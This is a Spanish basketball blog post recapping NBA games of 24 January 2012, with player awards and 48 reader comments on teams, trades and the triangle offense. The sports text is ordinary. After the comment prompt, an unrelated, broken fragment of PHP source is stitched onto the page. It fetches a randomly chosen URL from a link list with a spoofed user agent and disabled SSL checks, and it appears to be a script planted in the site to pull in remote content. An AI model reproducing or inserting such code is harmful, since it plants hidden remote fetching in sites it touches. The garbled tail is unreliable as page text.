La Crónica: Rachas rotas

25 de January de 2012 por TheDeerHunter

Lo pasaban mal los Grizzlies ayer para alargar su racha a 7 victorias pero esta noche hincaban la rodilla en el siempre complicado Rose Garden de Portland (87-94). Camby secaó a Marc con una impactante demostración defensiva y, excepto Mayo, ningún miembro del equipo de Memphis encontró su juego. El contrapunto ofensivo al poderío de Camby lo pusieron LaMarcus y Jamal Crawford. Únicamente el pésimo partido de Felton en la dirección evitó una sangría.

En el extremo opuesto, los Raptors recuperaban a Bargnani después de 8 derrotas consecutivas y el equipo respiró ofensivamente. Sensacional su regreso, así como la actuación de Barbosa, Amir y también de Calderón. Los Suns tampoco son un ogro defensivo pero con otro de esos masters en dirección de Nash plantaron cara en el intercambio de golpes (99-96). 6 derrotas consecutivas acumulaban los Knicks pero anoche se veían las caras ante unos Bobcats muy perdidos. Pueden dar gracias, porque el partidito que se marcó Carmelo es para hacérselo mirar. Con todo, el tridente Fields-Stat-Chandler sigue siendo bastante mejor que el Walker-Henderson-Derrick Brown. Esta victoria no es ni remotamente motivo para dejar de estar preocupados en la gran manzana (111-78).

No han llegado a caer en minicrisis Orlando, a pesar del ridículo de Boston. Ayer se quitaron la espina en una plaza complicada como es Indianapolis el día que Dwight Howard se convierte en el máximo cañonero de la historia de la franquicia. Chaparrón exterior que llegó desde el perímetro de los de Florida. 13 triplazos por encima del 40%, justo un día después de no haber sido capaces de pegarle a una vaca con un melón a dos metros de distancia (102-83).

Finalmente, LeBron volvía a vérselas con su ex-equipo, con un punto menos de acritud de lo que estábamos acostumbrados. Los Cavs se conjuraron para amargarle la noche y en parte lo consiguieron, pero en esta ocasión Bosh dio el paso al frente necesario para asegurar la victoria (85-92).

La noticia del día es, sin duda, la destitución de Flip Saunders como entrenador de los Washington Wizards. Habrá que ver quién se atreve a torear semejante miura.

PREMIOS

MVP: Trío de pívots en el MVP. Chris Bosh anotó 17 puntos en el último cuarto (35 en total) para amarrar la victoria de los Heat. Andrea Bargnani volvió de su lesión a lo grande (36 puntos) y Tyson Chandler se convirtió en el dueño y señor de la zona del Time Warner Cable Arena con 20 puntos y 17 rebotes.

Rookie: La lesión de DJ Augustine ha dejado vía libre a Kemba Walker. Frente a los Knicks fue el mejor del equipo con 22 puntos, 5 rebotes y 2 tapones. Kyrie Irving lideró una vez más a los Cavs con 17 puntos, 4 rebotes y 4 asistencias.

Sorpresa: Samardo Samuels disfrutó de 25 minutos en los que aportó 15 puntos y 5 rebotes, mientras que Hakim Warrick anotó 17 puntos para los Suns.

Decepción: Carmelo Anthony se quedó en un solo punto con un 0 de 7 en tiros de campo pero los Knicks ganaron por 33. Me lo expliquen.

Esfuerzo en vano: Marcin Gortat y Steve Nash se quedaron a solo 3 puntos de imponerse a los Raptors. El polaco anotó 21 puntos a los que sumó 12 rebotes y el canadiense se fue a los 17 puntos, 7 rebotes y 14 asistencias.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

48 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    Que pena me da ver a Steve Nash jugar con semejates compañeros

      Citar

  2. rumbero dice:
    #2

    Con Bosh a este nivel dan bastante miedito los Heat. La temporada anterior estuvo bastante cuestionado por su rendimiento pero parece que ha dado un paso al frente y cuando Lebron o Wade no acuden al rescate ahí está él.

    Siguiendo con el hilo abierto por Sancho: Rudy Gay no es jugador franquicia para Grizzlies. Buen jugador es, pero teniendo en cuenta el bloque que tienen los ositos, no veo que el plus de diferencia que aporta valga 15 kilos.

    Una de cal y otra de arena para melo. Lamentable Anthony y grande Kemba

      Citar

  3. rojorob dice:
    #3

    Considerar a Walker-Henderson-Derrick Brown un tridente es seguro mucho más de lo que nunca pudieron soñar.

      Citar

  4. TheDeerHunter dice:
    #4

    Pues yo sigo pensando que Washington puede ser un buen sitio para caer como entrenador. Muchos mimbres y poca exigencia…
    Lamentablemente Saunders no ha logrado hacerse con las riendas estos años y hacía falta cambio de cara en el banco.

      Citar

  5. Cocinitas dice:
    #5

    Habrá que ver cuantos tiros le dejan a Bosh cuando vuelva Wade. Ayer a Marc le pasaron factura los partidos acumulados, muy mal partido de Gasol. Aún asi los Grizzlies no creo que vayan a tener problemas para entrar en Playoffs.

      Citar

  6. wind_bird dice:
    #6

    Washington es un buen sitio sí… pero me gustaría saber si Wall esta asi por sus lesiones, porque es su segundo año y eso es de por si dificil… o porque ha sido un sueño de verano…

    Cada vez que lo he visto me ha parecido mas vulgar…

      Citar

  7. melo15 dice:
    #7

    Me esta sorprendidedo positivamente Bosh, tendria que ser titular en el all-star.
    Kemba demuestra que es el mejor Rookie, si le dan minutos, 22-5-5 partidazo.
    Que a nadie se le ocurra decir que los Knicks ganan si Melo no puntua, encima de que es generoso y reconoze que tiene una mala noche y deja de tirar, hace lo mejor para el equipo, cualquiera habria seguido tirando

      Citar

  8. rumbero dice:
    #8

    wind_bird:
    Washington es un buen sitio sí… pero me gustaría saber si Wall esta asi por sus lesiones, porque es su segundo año y eso es de por si dificil… o porque ha sido un sueño de verano…

    Cada vez que lo he visto me ha parecido mas vulgar…

    Hombre, yo creo que a Wall tampoco se le puede pedir a dia de hoy que sea del capitán de un equipo donde cada uno rema a su aire, que no tiene claro a que juega, y que acumula derrota tras derrota. Le suelen ir más rapido las piernas y las manos que la cabeza, pero como comentaba con el caso Westbrook, es un problema que con 20 años tiene margen de mejora, al igual que su limitado tiro exterior. Además está el fatídico segundo año que comentas y que todo el equipo ha bajado el rendimiento, no solo él. Yo le veo maneras de estrella la verdad. Más vulgar me parece Blatche que podría ser un pedazo de jugador pero que se conecta 1 de cada 10 partidos.

    PD: ¿Van a traer a un nuevo coach o se queda Wittman? Porque sino hay un cambio drástico va a ser más de lo mismo….
    PD: ¿Rashard Lewis, socio nº1 del club se dejaba llevar, es el veterano de la plantilla que tiene que coger a los chavales del cuello cada vez que se ponen en modo estrellita y enseñarles de que va esto? En fin…es que con los Wizards me enciendo. Que vuelva Arenas con la pipa y los cuadre a todos!

      Citar

  9. Blade Petrovic dice:
    #9

    melo15:
    Me esta sorprendidedo positivamente Bosh, tendria que ser titular en el all-star.
    Kemba demuestra que es el mejor Rookie, si le dan minutos, 22-5-5 partidazo.
    Que a nadie se le ocurra decir que los Knicks ganan si Melo no puntua, encima de que es generoso y reconoze que tiene una mala noche y deja de tirar, hace lo mejor para el equipo, cualquiera habria seguido tirando

    Melo como siempre defendiendo a carmelo qe me parece q se tiene q pensar eso de tanto tirar aunque ayer lo hizo bien al no tirar tanto.
    Yo no si creeis q los knicks seran campeones si hoy fueran las finales no pero yo espero bastante de baron y creo q puede dar un cambio al equipo

      Citar

  10. Sancho88 dice:
    #10

    Rumbero, esa es la diferencia entre dos veteranos como Lewis y Antawn Jamison. Mientra Jamison implica al resto, les enseña en la cancha y fuera de ella, supongo que también, el señor Lewis solo mira por sus estadísticas, y ya ni eso. Menudos zorros de estadísticas, de actitud y de todo. Por que no amnistiaron a este tío? Coño, si yo estaba convencidísimo que esa cláusula la habían creado por el tema de los 20 kilos de Rashard Lewis y Gilbert Arenas.

    A mí lo que más pena me da de los Wizards, es que no me explico la poca presión mediática que tienen, siendo la segunda o tercera ciudad más importante de los Estados Unidos… para los más versados, alguien sabe si hay hockey, beisbol o cualquier guarrada de esas a buen nivel en DC?

    A mí no me daría tanto miedo como a Deer entrenar a estos chicos. Es innegable que tienen un potencial alto. Creo que ahí falta una autoridad que le quite los galones al señor Lewis y se los dé al resto. Esto parecería infructuoso, pero si echas a ese señor, el resto van a saber que no aplaudes la actitud estadista dentro de la plantilla. Y tipos como Jordan Crawford o Nick Young se pondrían las pilas a defender, y no seguirían imitando al veterano de la plantilla. Vamos, creo que puede ser una visión de los hechos. Igual es que estamos todos equivocados y estos tíos son muy paquetes. Pero no creo…

      Citar

  11. Jose Luis dice:
    #11

    pero Sancho, ten en cuenta que a Washington lo que le convenía era estar abajo otro año y pillarse una buena ronda de draft. Si amnistías a Lewis, tienes que seguir pagándole el contrato, y además, para llegar al mínimo salarial, tienes que contratar a otros jugadores y pagarles unos 17 millones entre ellos. Negocio muy malo sin duda, más vale quedarse con Rashard y soltar 20 kilos en lugar de 37, y además pillas una buena ronda, y cuando quieras amnistiarlo para tener espacio, lo haces y punto.

      Citar

  12. MagicJohnson32 dice:
    #12

    Creo que Washington no está ni entre las 20 principales ciudades del país en cuanto a población. Está por detrás de NY, LA, Chicago, Philadelphia, Phoenix, Dallas, Houston, Indianapolis, San Francisco, San Jose, Detroit, Boston, Seattle… Como área está más arriba, pero en ningún caso en el Top 5.

    El principal equipo de la ciudad son los Redskins de la NFL, y luego están los Nationals de la MLB y los Capitals de la NHL.

    No sé, tuvieron una buena época al final de los 70 con el anillo del 78 y las finales del 79, pero tampoco creo que sean una franquicia con una trayectoria que lleve a los medios a meterles presión, y más cuando casi acaban de empezar la reconstrucción. Con un equipo así casi conviene quedar mal y tener buenas elecciones del draft ¿no?

      Citar

  13. melo15 dice:
    #13

    Beuno, en poblacion no pero son la ciudad mas poderosa del mundo, algo tiene que contar. Yo ya he dejado de confiar en Blachte, que pillan un par de jugadores en el proximo draft, y a ganar

      Citar

  14. simon dice:
    #14

    Lo mismo me equivoco pero el equipo con Baron y sin el no va a cambiar mucho, serán mejores con Baron eso está claro, pero seguirá siendo el 8º de la conferencia ( y gracias ) y en primera ronda para casa con un 4-1.

      Citar

  15. Esteban dice:
    #15

    Recordemos el analisis de wash, donde los ponian comop candidatos a PO… para fueron y siguen siendo la peor plantilla de la NBA,

    Carmelo y shumpert traspasado por wall y young, y para hacerlo cuajar meter a lewis tamb

      Citar

  16. HisRoyalAirness dice:
    #16

    Lo de que Steve Nash sea líder de asistencias de la liga rodeado de semejante mediocridad es para que le hagan una estatua de oro en Arizona. En serio, es la grandeza personificada, un traspaso YA.

    Melo, coño, déjate de mirar los box-scores y decir que este es mejor que el otro. Nadie ha dudado nunca de la capacidad anotadora de Kemba o Irving pero ser un buen jugador es mucho más que eso. Anotadores ha habido y habrà siempre a patadas, por eso se cotizan tanto los jugadores versátiles. Es como si yo hoy me levanto, veo el box score de Knicks y digo que Carmelo es un paquete y Chandler el mejor center de la liga.
    Por cierto, ayer me gustó que Anthony no se obcecó y dejó a Chandler y Stoudamire tirar del carro y se dedicò a aportar en otras cosas. Pero vamos, que los Knicks o hacen algo con su plantilla o mal

      Citar

  17. Esteban dice:
    #17

    hombre, revisando el analisis de toronto antes de esta temporada, y viendo como le pegamos TODOS bargnani, parece que andrea lo leyo y esta decidido a taparnos la boca

    algunos comentarios aseguraban que nunca seria un all-star, pues bien creo que esta misma temporada lo sera, si vemos el este mejor ala-pivot que el encontramos a bosh de enorme temporada y de pivot obviamente howard

    para suplente del este, tanto de ala pivot, lo veo por delante de la floja campaña de stat y muy por ensima de boozer, ni hablar de west, brand y sobre smith sin dudas

    sobre los pitos, parece que hibbert y chandler estan compitiendo con el sobre el pivot suplnete, ninguno de los dos llega al nivel que esta jugando andrea, en 12 partidos jugados ha superado en 5 los 30 puntos, llendose cmo anoche a los 36 y siendo la carta ganadora de su equipo

    muy criticado fue su pick, pero creo que colangelo vio el talento oculto n el, y la capacidad de mejorar hasta el infinito, y llegar a ser tan bueno como dirk, recordemos que hasta los PO pasado el aleman era catalogado como un perdedor

    pues vi a los raptors ayer, y un hombre de 2.13 con tantos fundametos como bargnani, solo lo encuentro en dirk, un lazamiento de 3 puntos letal, y un tiro extraordinario,sin dudas no fue un jugador de impacto inmediato, pero creo que esta sera su temporada de quiebre, para el y los raptos y un gran futuro les espera

    BARGNANI ALL.STAR!!!
    BARGNANI ALL.STAR!!!
    BARGNANI ALL.STAR!!!
    BARGNANI ALL.STAR!!!
    BARGNANI ALL.STAR!!!

      Citar

  18. Denise dice:
    #18

    Según MARCA, Gasol ha dicho: “No creo que Dwight Howard tenga mucho más talento en la pintura que Bynum y yo”

    Si es verdad que ha dicho eso, creo que es su única mala declaración que le he escuchado. Podrá decir con esto la verdad o la mentira, pero esta frase está totalmente fuera de lugar. Esperemos que Pau no se convierta en otro tonto que dice muchas bobadas en la prensa y en la cancha demuestra poco.

      Citar

  19. melo15 dice:
    #19

    Hombre como Dirk nose

      Citar

  20. melo15 dice:
    #20

    Si va a ser como Dirk que lo demuestre

      Citar

  21. Sancho88 dice:
    #21

    Denise:
    Según MARCA, Gasol ha dicho: “No creo que Dwight Howard tenga mucho más talento en la pintura que Bynum y yo”

    Si es verdad que ha dicho eso, creo que es su única mala declaración que le he escuchado. Podrá decir con esto la verdad o la mentira, pero esta frase está totalmente fuera de lugar. Esperemos que Pau no se convierta en otro tonto que dice muchas bobadas en la prensa y en la cancha demuestra poco.

    Denise, como periodista, te digo qué ha pasado ahí. Le han preguntado a Pau: Oye pau, el howard este es mejor que tu y que Bynum en la pintura? o… igual ha dicho que están al mismo nivel o algo así, y la frase que vende es darle la vuelta y decir eso, que Howard no tiene mas talento que él. Pero bueno, manipulaciones en el marca, que supongo que es donde ha salido, día sí día también. Conociendo a Pau no creo que se haya marcado una sobrada de ese estilo, más bien creo que los periodistas lo han puesto como les ha salido de las pelotas. Es triste que hagan eso, pero es lo que hay

      Citar

  22. Sancho88 dice:
    #22

    Bueno, hoy toca jornada de las tochas. Ahora bien, antes de analizar qué podemos ver esta noche, un apunte. Creo que la liga debería parar dos-tres días, porque cada día dan mas pena los partidos. Se ven incluso gestos en los jugadores que denotan resignación, quiero decir, que no pelean los partidos fuera de casa, PORQUE ESTÁN FUNDIDOS. Además, mucho me temo qeu se están matando a jeringuillazos, y eso es muy peligroso, porque puedne estar ocultando pequeñas lesiones, parando el dolor, y forzando a los jugadores a lesiones muy serias. No sé que pensáis vosotros. Sé que cobran mucha pasta, pero creo que no es normal el calendario, porque al final por tanta saturación los partidos acaban siendo mucho menos espectaculares, más rácanos, etc.

    En lo méramente deportivo. Segundo partido fuera en dos noches de los Knicks. A ver como evoluciona el culebrón de la temporada, y a ver si debuta Baron Davis. En principio se espera que el sábado esté, pero ya sabemos como van estas cosas, el tipo lleva entrenándose desde el sábado, y si la cosa va mal contra los Cavs, yo creo que tendrá sus minutos.

    Luego, un partido muy interesante en el este será el Indiana-Chicago. A ver cómo sigue Rose con sus dolores, me parece una actitud muy profesional la que ha tomado, pero lo que digo, pinchazo va, pinchazo viene. No va a jugar Deng, y yo creo que hoy los Pacers pueden dar la sorpersa. Además, sin Gibson. Indiana me parece un equipo muy inteilgente que sabe leer los partidos y aprovechar las taras del rival. Hibbert puede meter mano, ante la fala de rotación interior sin Gibson. A ver cómo defiende Collison a Rose, creo que será la clave del partido. Me gusta mucho la segunda línea con George Hill y Hansbrough… la verdad, pedazo de plantilla de los Pacers.

    Después, Minnesota visita al campeón. Tengo entendido que les darán el anillo hoy, pero es algo que he oído, no lo sé seguro. Supongo que el orguyo del campeón saldrá a relucir, me parece que salvo milagros de Ricky, esta noche se huele paliza de los Mavs.

    Y el partido de la jornada, para valientes trasnochadores, el Lakers-Clippers. Yo creo que el partido de hoy puede ser muy muy importante. Si pierden los Lakers, me parece que se van a tomar medidas, y de las gordas. Yo sigo manteniendo que veo a Pau fuera del equipo antes del tradeline. Y no descartaría la idea que viene aportando Denise desde el principio de temporada. Veo un megatraspaso por Dwight Howard. Veremos que pasa.

    Y otros partidos interesantes, el Atlanta-San Antonio. Los Spurs ya no son imbatibles en casa, gracias a mis Kings, xd; luego, un partido a priori intrascendente, puede ser morboso. A ver cómo debutan los Wizards contra los Bobcats. Parece una buena oportunidad para sacar la cabeza, aunque muchos apuntáis a que van a buscar el número 1 del draft.

    Y por último, los Kings serán peligrosos en casa contra Denver, y además será un partido muy chulo de ver, dos equipos a campo abierto, a masacrarse a canastas. Me encanta. Y al final, Blazers-Warriors. Qué ganas tengo de que ganen los Warriors. Seguramente Blazers se borren. Veo favorito a Warriors

      Citar

  23. Sancho88 dice:
    #23

    Digo debutan, con el nuevo entrenador, los Wizards, lógicamente

      Citar

  24. Esteban dice:
    #24

    Sancho, comparto lo de los pacers, tienen un gran equipo pero tienen un problema, GRANGER, si bien es un gran jugador y q encaja y no se cela por el protagonismo de sus compañeros, su sueldo y haber sido all star, deberia ser mas protagonista y volver a sus 25 pp, creo q necesitan mas de el para pelear por un lugar en final de conferencia

    Creo q los pacers deben traspasarlo lo antes posible, primero para darle cabida de alero a george y segundo, porq si sigue con este declive en sus numeros, nadie querra asumir su contrato y ademas los pacers cuandop empiezen a terminarse sus contratos rookies y deban renovar necesitaran ese espacio salvo q este desrtinado a una estrella q parece q granger no lo es

      Citar

  25. Esteban dice:
    #25

    Lastima q el contrrato de joe jhonson es extremadasmente caro, largo y toxico, y los pacers ya ussron tontamente su anmistia, sino un trade jj por granger seria bastante logico

    Los hawks, liberar muchos millones en comparacion de contratos, espacio q necesitan y mucho

    Los pacers consiguen un escolta, ya q george es alero, y tienen mucho espacio, lo q podrian asumir el contrato de jj sin inconvenientes

      Citar

  26. Sancho88 dice:
    #26

    Ojito el 13-6-9 de Ricky en el tercer cuarto. Ojito, ojito

      Citar

  27. Pop dice:
    #27

    Bueno, al final los Wolves se han comido a Dallas que ha echado muchisimo de menos a Dirk. 31/10 para Love y 17/12/7 para Ricky, y 4 robos. Flojo en el % de tiro. En cuanto a las 7 pérdidas, que son demasiadas, decir que 5 han sido en los últimos minutos, donde yo creo que ya estaba reventado, porque ante la baja de Ridnour y Barea se ha chupado el partido enterito (46 minutos)

      Citar

  28. HisRoyalAirness dice:
    #28

    Pop:
    Bueno, al final los Wolves se han comido a Dallas que ha echado muchisimo de menos a Dirk. 31/10 para Love y 17/12/7 para Ricky, y 4 robos. Flojo en el % de tiro. En cuanto a las 7 pérdidas, que son demasiadas, decir que 5 han sido en los últimos minutos, donde yo creo que ya estaba reventado, porque ante la baja de Ridnour y Barea se ha chupado el partido enterito (46 minutos)

    Cierto, al final ya se le notaba quemadísimo, sólo descansó 2 minutos. Yo con lo del tiro no me preocuparia porque no tiene una mala mecánica pero como siempre pasa a los compañeros los tiros que toma suelen ser bastante forzados. Muy bien desde la línea, de todas maneras y un triple que metió cuando iban muy abajo. Lo de los robos es un escàndalo. Molan mucho los Wolves, van a ser los nuevos Kings o Suns, cuando pillen el punto van a dar mucha guerra. Y Ellington ya le ha comido la tostada a Wesley Johnson, gracias a dios y Pekovic, poco a poco a Darko

      Citar

  29. Sancho88 dice:
    #29

    Bueno, si alguien quiere enfundarse una zamarra que tenga por casa y aparecer por Sacramento, que sepa que hay bufet libre en la zona de los Kings. Ahí cualquiera puede entrar sin preocupaciones y dejar su bandejita… Hacía tiempo que no me desesperaba tanto con la actitud defensiva de estos tíos. Al final voy a acabar echando en falta a Chuch Hayes…

      Citar

  30. Sancho88 dice:
    #30

    Bueno, sinceramente, creo que no he visto defender peor ni en la liga filipina. menuda cagada. Es que cualquiera que la coge entra tranquilamente: Keneth Faried, Birdman…. cualquiera. Es lamentable

      Citar

  31. German dice:
    #31

    Alguien esta viendo Clippers@Lakers? Jugados tres cuartos Kobe tomo solo 10 tiros, gran noche de Gasol y de Griffin. Atencion a la jugada de este ultimo dejando plantado a Pau y haciendo una finta en el aire sobre Bynum… impresionante.

      Citar

  32. Sancho88 dice:
    #32

    Yo lo estoy viendo, pero me he reenganchado a partir del tercer cuarto. Lakers es un solar. Se las dan todas a Pau y el resto se desentienden. No es entendible lo de McRoberts… ese tipo no tiene nivel para jugar en los Lakers.

    Algún problema tiene que tener Kobe, porque no está jugando.

      Citar

  33. Sancho88 dice:
    #33

    Bueno, ya ha salido y a partir de ahora solo tirará él. Este desmadre en el atake Laker no ocurriría jamás con Jackson en el banquillo. Yo no sé si alguna vez haya ocurrido en la historia de la liga que los jugadores desobecen a su entrenador en los sistemas. Quiero decir, podría ocurrir que en un momento dado Pau y Bryant hablaran para volver a jugar el triángulo mágico? Pau podría hacer de Odom y Bynum de Pau. En estos momentos veo que podría ser una solución a la crisis

      Citar

  34. German dice:
    #34

    Es increible como entre el GM y Brown arruinaron a un equipo como Lakers. Como tambien es increible ver a World Peace tomando decisiones atinadas.
    Pau haciendo un gran partido, tapandole la boca a la prensa. Parece que se lo llevan los locales

      Citar

  35. Sancho88 dice:
    #35

    EL STAPLES CENTER RENDIDO A LA MAGIA DE METTA WORLD PEACE. Todo empezó con un robo de balón a Blake Griffin, siguió con los golpes en el pecho al estilo tarzán, y a partir de ahí se fue de madre. Clava un triple, penetra para dar una asistencia a Bynum, enseña los dientes gruñendo… un espectáculo. Defensivamente, este tío es una delicia. Joder, que cagada hicieron con Odom. Ves el equipo, y es que realmente se le echa en falta, es como si hubiera un hueco en el quinteto que solo puede ocupar él.

    De todas formas, Fisher-Bryant-Artest-Odom-Gasol, para mí será el quinteto que se recordará del equipo de los dos anillos. Y sigo diciendo que este equipo solo tiene sitio para un center. Pau sobra, ya que a Bynum no creo que le traspasen, a no ser que vayan a por la bestia parda y decidan dejar a Pau de 4 abierto para acompañar.

      Citar

  36. German dice:
    #36

    Por cierto sobre McRoberts, coincido. Ese tipo se arrastra por la cancha, no defiende, no corre… nada. Escandaloso lo de los arbitros tambien, pitaron media docena de tecnicas (sino mas), una mas incomprensible que la otra.

      Citar

  37. Esteban dice:
    #37

    Cp3 apenas a jugado, sino no habria partido, los clips lo habrian ganado con faciidad, es cp3 ha jugado decididamente mal los ultimos minutos, a tal nibel de darle la bola a jordan en la linea de libre para q bote yt enfrente a un tal bynum, obviamente termino en tapa y fin de partido

      Citar

  38. Sancho88 dice:
    #38

    Bueno, las decisiones incorrectas de CP3 al final del partido, a mi juicio, vienen provocadas por la desconfianza. La jugada anterior a la que tú comentas se traga un tapón de Artest, y luego ya no se atreve a jugársela él mismo. Griffin dio la talla, no así Paul ni Butler

      Citar

  39. Esteban dice:
    #39

    Paul viene lesiomado y hace 5 q no juegan jugo mal al final y todos jugaron mal, de el depende la suerte de estos clips

      Citar

  40. melo15 dice:
    #40

    Qué es el triangulo este?
    Metta, es crack (cuando quiere).
    qué tal le ha ido a los Knicks?

      Citar

  41. simon dice:
    #41

    Pues que los Cavs les han dado por todos los lados… se quedaron en 80 puntitos…

      Citar

  42. RSB dice:
    #42

    Hombre Sancho que Pau sobra… Tú quitale a Pau a estos Lakers, y se convierten en un equipo de zona baja del oeste descaradamente. De hecho yo estoy deseando que lo traspasen, para que todos los que se han llenado la boca estos meses tildándolo de acabado, se echen las manos a la cabeza cuando vean todo lo que aportaba el “blando” a este equipo, más allá de los números (que por cierto, siguen sin estar nada mal)

      Citar

  43. Pop dice:
    #43

    melo15: Qué es el triangulo este?Metta, es crack (cuando quiere).qué tal le ha ido a los Knicks?

    Mecachis, melo, me fallas en los fundamentos. Me eres capaz de analizarme la CNAA y luego no me sabes lo que es el triángulo ofensivo de Phil. Es un esquema de juego (el maestro Zen lo mismo dice que es un modo de vida) basado en un tridente ofensivo formado por 3 hombres en cancha, que son los que se reparten el bacalao. Por ejemplo, Jordan-Pippen-Grant, Kobe-Horry-O’Neal o Kobe-Odom-Pau…

      Citar

  44. TheDeerHunter dice:
    #44

    Pop: Mecachis, melo, me fallas en los fundamentos. Me eres capaz de analizarme la CNAA y luego no me sabes lo que es el triángulo ofensivo de Phil. Es un esquema de juego (el maestro Zen lo mismo dice que es un modo de vida) basado en un tridente ofensivo formado por 3 hombres en cancha, que son los que se reparten el bacalao. Por ejemplo, Jordan-Pippen-Grant, Kobe-Horry-O’Neal o Kobe-Odom-Pau…

    En realidad, matizando el comentario de Pop. El sistema no es que consista en tres tíos concretos que “reparten el bacalao”, sino que es una disposición de jugadores en ataque, para distribuir espacios y amenazas en ataque, además de facilitar y racionalizar los repliegues.
    Viene a iniciarse con un interior al poste bajo, el base a la esquina y un alero en la prolongación de la línea de tiros libres. Los otros dos en el lado débil abriendo espacios en forma imaginaria de triángulos entre el 2-1-2 imaginario.
    A partir de ahí es un sistema de variantes de rutas sin balón en el que se van desplazando los jugadores y el movimiento previsto de la bola. Si te fijabas la bola fluía entre las aristas de esos triángulos imaginarios-cambiantes que comentaba.
    Una vez me planteé hacer un artículo explicativo… pero se me escaba el asunto.

      Citar

  45. TheDeerHunter dice:
    #45

    Por cierto… que si alguien tiene interés y tiene alguno de últimos nba 2k, en el libro de jugadas (y en realidad en cada jugada automática que ejecuten Lakers) se puede observar el sistema de forma impresionante.

      Citar

  46. TheDeerHunter dice:
    #46

      Citar

  47. Pop dice:
    #47

    Ya, Deer. Pensaba que con el nombre se intuiría lo de la posición en vértices de un triángulo. No quería sobresaturar al pobre de melo…

      Citar

  48. TheDeerHunter dice:
    #48

    Pop:
    Ya, Deer. Pensaba que con el nombre se intuiría lo de la posición en vértices de un triángulo. No quería sobresaturar al pobre de melo…

    jeje… pero ¿y lo que va a triunfar Melo entre las chicas haciéndose experto en triángulos?? ;D

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>